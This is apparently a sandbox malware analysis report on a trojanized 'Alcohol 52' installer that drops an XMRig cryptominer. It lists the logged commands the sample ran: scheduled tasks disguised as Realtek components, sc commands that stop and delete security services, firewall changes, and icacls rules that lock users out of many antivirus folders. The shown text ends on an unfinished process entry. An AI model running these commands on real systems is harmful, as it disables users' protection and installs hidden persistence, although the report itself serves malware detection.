Analysis

  • max time kernel
    151s
  • max time network
    152s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    01-06-2024 03:28

General

  • Target

    Alcohol_120_v2.0.3/Alcohol.52.Free.Edition.v2.0.3.6951.exe

  • Size

    871KB

  • MD5

    a801066da12e786c0277e70c191bc936

  • SHA1

    2920b27e50c079f99502d2f574655e20657bdebd

  • SHA256

    599297d2596c79c0f43b555a88a77f7f89943397298a60cf7fc991b6d0e696c3

  • SHA512

    31292e5ebebb03de4018b04a28324c65e36656472cdc98328ad4f77544a762f5f0c397b6f12c886272fc08f4d9fa7579560e0cf33f02e19af4fd7e7731d619d8

  • SSDEEP

    12288:GCdOy3vVrKxR5CXbNjAOxK/j2n+4YG/6c1mFFja3mXgcjfRlgsUBgasLvhpFQ:GCdxte/80jYLT3U1jfsWasDbFQ

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 1 IoCs
  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Modifies Windows Firewall 2 TTPs 5 IoCs
  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 7 IoCs
  • Loads dropped DLL 8 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 6 IoCs
  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Modifies system certificate store 2 TTPs 6 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe
    "C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\Alcohol.52.Free.Edition.v2.0.3.6951.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin
      C:\Users\Admin\AppData\Local\Temp\Alcohol_120_v2.0.3\data0.bin -ptoptorrent
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2280
      • C:\ProgramData\Setup\update.exe
        "C:\ProgramData\Setup\update.exe"
        3⤵
        • Modifies Windows Defender Real-time Protection settings
        • Blocks application from running via registry modification
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies WinLogon
        • Drops file in Program Files directory
        • Modifies system certificate store
        • NTFS ADS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2232
        • C:\ProgramData\Setup\taskhost.exe
          C:\ProgramData\Setup\taskhost.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:2664
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c C:\programdata\microsoft\temp\H.bat
            5⤵
            • Drops file in Drivers directory
            PID:2712
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:2472
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:2816
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
            5⤵
            • Creates scheduled task(s)
            PID:1668
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2668
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:2808
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhost" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC ONLOGON /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:3004
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Taskhostw" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 2 /RL HIGHEST
          4⤵
          • Creates scheduled task(s)
          PID:476
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appidsvc
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:540
          • C:\Windows\SysWOW64\sc.exe
            sc start appidsvc
            5⤵
            • Launches sc.exe
            PID:580
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc start appmgmt
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1540
          • C:\Windows\SysWOW64\sc.exe
            sc start appmgmt
            5⤵
            • Launches sc.exe
            PID:1636
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1848
          • C:\Windows\SysWOW64\sc.exe
            sc config appidsvc start= auto
            5⤵
            • Launches sc.exe
            PID:1988
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1628
          • C:\Windows\SysWOW64\sc.exe
            sc config appmgmt start= auto
            5⤵
            • Launches sc.exe
            PID:2320
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c sc delete swprv
          4⤵
            PID:1652
            • C:\Windows\SysWOW64\sc.exe
              sc delete swprv
              5⤵
              • Launches sc.exe
              PID:868
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c sc stop mbamservice
            4⤵
              PID:1808
              • C:\Windows\SysWOW64\sc.exe
                sc stop mbamservice
                5⤵
                • Launches sc.exe
                PID:2012
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
              4⤵
                PID:1604
                • C:\Windows\SysWOW64\sc.exe
                  sc stop bytefenceservice
                  5⤵
                  • Launches sc.exe
                  PID:1940
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                4⤵
                  PID:1944
                  • C:\Windows\SysWOW64\sc.exe
                    sc delete bytefenceservice
                    5⤵
                    • Launches sc.exe
                    PID:2304
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c sc delete mbamservice
                  4⤵
                    PID:1036
                    • C:\Windows\SysWOW64\sc.exe
                      sc delete mbamservice
                      5⤵
                      • Launches sc.exe
                      PID:2208
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c sc delete crmsvc
                    4⤵
                      PID:1744
                      • C:\Windows\SysWOW64\sc.exe
                        sc delete crmsvc
                        5⤵
                        • Launches sc.exe
                        PID:2636
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                      4⤵
                        PID:800
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh advfirewall set allprofiles state on
                          5⤵
                          • Modifies Windows Firewall
                          PID:1784
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                        4⤵
                          PID:1312
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                            5⤵
                            • Modifies Windows Firewall
                            PID:2464
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                          4⤵
                            PID:2484
                            • C:\Windows\SysWOW64\netsh.exe
                              netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                              5⤵
                              • Modifies Windows Firewall
                              PID:1908
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                            4⤵
                              PID:2164
                              • C:\Windows\SysWOW64\netsh.exe
                                netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                5⤵
                                • Modifies Windows Firewall
                                PID:2748
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                              4⤵
                                PID:2756
                                • C:\Windows\SysWOW64\netsh.exe
                                  netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                  5⤵
                                  • Modifies Windows Firewall
                                  PID:3012
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                4⤵
                                  PID:2432
                                  • C:\Windows\SysWOW64\icacls.exe
                                    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                    5⤵
                                    • Modifies file permissions
                                    PID:1936
                                • C:\Windows\SysWOW64\cmd.exe
                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                  4⤵
                                    PID:2976
                                    • C:\Windows\SysWOW64\icacls.exe
                                      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                      5⤵
                                      • Modifies file permissions
                                      PID:2492
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                    4⤵
                                      PID:820
                                      • C:\Windows\SysWOW64\icacls.exe
                                        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                        5⤵
                                        • Modifies file permissions
                                        PID:1352
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                      4⤵
                                        PID:1468
                                        • C:\Windows\SysWOW64\icacls.exe
                                          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                          5⤵
                                          • Modifies file permissions
                                          PID:1608
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                        4⤵
                                          PID:1764
                                          • C:\Windows\SysWOW64\icacls.exe
                                            icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                            5⤵
                                            • Modifies file permissions
                                            PID:1760
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                          4⤵
                                            PID:1972
                                            • C:\Windows\SysWOW64\icacls.exe
                                              icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                              5⤵
                                              • Modifies file permissions
                                              PID:1956
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                            4⤵
                                              PID:1960
                                              • C:\Windows\SysWOW64\icacls.exe
                                                icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                5⤵
                                                • Modifies file permissions
                                                PID:1016
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                              4⤵
                                                PID:676
                                                • C:\Windows\SysWOW64\icacls.exe
                                                  icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                  5⤵
                                                  • Modifies file permissions
                                                  PID:2792
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                4⤵
                                                  PID:872
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                    5⤵
                                                    • Modifies file permissions
                                                    PID:1588
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                  4⤵
                                                    PID:1568
                                                    • C:\Windows\SysWOW64\icacls.exe
                                                      icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                      5⤵
                                                      • Modifies file permissions
                                                      PID:1584
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                    4⤵
                                                      PID:1732
                                                      • C:\Windows\SysWOW64\icacls.exe
                                                        icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                        5⤵
                                                        • Modifies file permissions
                                                        PID:1696
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                      4⤵
                                                        PID:2084
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                          5⤵
                                                          • Modifies file permissions
                                                          PID:2080
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                        4⤵
                                                          PID:2072
                                                          • C:\Windows\SysWOW64\icacls.exe
                                                            icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                            5⤵
                                                            • Modifies file permissions
                                                            PID:1720
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                          4⤵
                                                            PID:2952
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls c:\programdata\Malwarebytes /deny System:(F)
                                                              5⤵
                                                              • Modifies file permissions
                                                              PID:1452
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                            4⤵
                                                              PID:1032
                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                5⤵
                                                                • Modifies file permissions
                                                                PID:2476
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                              4⤵
                                                                PID:2200
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls C:\Programdata\MB3Install /deny System:(F)
                                                                  5⤵
                                                                  • Modifies file permissions
                                                                  PID:2660
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                4⤵
                                                                  PID:2052
                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                    icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                    5⤵
                                                                    • Modifies file permissions
                                                                    PID:2884
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                  4⤵
                                                                    PID:2640
                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                      icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                      5⤵
                                                                      • Modifies file permissions
                                                                      PID:2412
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                    4⤵
                                                                      PID:2456
                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                        icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                        5⤵
                                                                        • Modifies file permissions
                                                                        PID:2820
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                      4⤵
                                                                        PID:2436
                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                          icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                          5⤵
                                                                          • Modifies file permissions
                                                                          PID:372
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                        4⤵
                                                                          PID:3004
                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                            icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                            5⤵
                                                                            • Modifies file permissions
                                                                            PID:1640
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                          4⤵
                                                                            PID:324
                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                              icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                              5⤵
                                                                              • Modifies file permissions
                                                                              PID:552
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                            4⤵
                                                                              PID:2004
                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                5⤵
                                                                                • Modifies file permissions
                                                                                PID:1668
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                              4⤵
                                                                                PID:276
                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                  icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                  5⤵
                                                                                  • Modifies file permissions
                                                                                  PID:1616
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                4⤵
                                                                                  PID:1120
                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                    icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                    5⤵
                                                                                    • Modifies file permissions
                                                                                    PID:1820
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                  4⤵
                                                                                    PID:2312
                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                      icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                      5⤵
                                                                                      • Modifies file permissions
                                                                                      PID:1328
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                    4⤵
                                                                                      PID:560
                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                        icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                        5⤵
                                                                                        • Modifies file permissions
                                                                                        PID:284
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                      4⤵
                                                                                        PID:2328
                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                          icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                          5⤵
                                                                                          • Modifies file permissions
                                                                                          PID:1996
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                        4⤵
                                                                                          PID:2152
                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                            icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                            5⤵
                                                                                            • Modifies file permissions
                                                                                            PID:1600
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                          4⤵
                                                                                            PID:968
                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                              icacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                              5⤵
                                                                                              • Modifies file permissions
                                                                                              PID:1040
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                            4⤵
                                                                                              PID:532
                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                icacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                5⤵
                                                                                                • Modifies file permissions
                                                                                                PID:2332
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)
                                                                                              4⤵
                                                                                                PID:928
                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                  icacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)
                                                                                                  5⤵
                                                                                                  • Modifies file permissions
                                                                                                  PID:2440
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                4⤵
                                                                                                  PID:2396
                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                    icacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                    5⤵
                                                                                                    • Modifies file permissions
                                                                                                    PID:796
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)
                                                                                                  4⤵
                                                                                                    PID:1740
                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                      icacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)
                                                                                                      5⤵
                                                                                                      • Modifies file permissions
                                                                                                      PID:1920
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)
                                                                                                    4⤵
                                                                                                      PID:684
                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                        icacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)
                                                                                                        5⤵
                                                                                                        • Modifies file permissions
                                                                                                        PID:2128
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                      4⤵
                                                                                                        PID:2096
                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                          icacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                          5⤵
                                                                                                          • Modifies file permissions
                                                                                                          PID:2432
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                        4⤵
                                                                                                          PID:2176
                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                            icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                            5⤵
                                                                                                            • Modifies file permissions
                                                                                                            PID:820
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)
                                                                                                          4⤵
                                                                                                            PID:992
                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                              icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)
                                                                                                              5⤵
                                                                                                              • Modifies file permissions
                                                                                                              PID:2368
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                            4⤵
                                                                                                              PID:1768
                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)
                                                                                                                5⤵
                                                                                                                • Modifies file permissions
                                                                                                                PID:1664
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                              4⤵
                                                                                                                PID:2876
                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                  icacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                  5⤵
                                                                                                                  • Modifies file permissions
                                                                                                                  PID:2960
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                4⤵
                                                                                                                  PID:2900
                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                    icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                    5⤵
                                                                                                                    • Modifies file permissions
                                                                                                                    PID:2836
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)
                                                                                                                  4⤵
                                                                                                                    PID:1008
                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                      icacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)
                                                                                                                      5⤵
                                                                                                                      • Modifies file permissions
                                                                                                                      PID:2800
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                    4⤵
                                                                                                                      PID:2832
                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                        icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)
                                                                                                                        5⤵
                                                                                                                        • Modifies file permissions
                                                                                                                        PID:2068
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)
                                                                                                                      4⤵
                                                                                                                        PID:2696
                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                          icacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)
                                                                                                                          5⤵
                                                                                                                          • Modifies file permissions
                                                                                                                          PID:2572
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
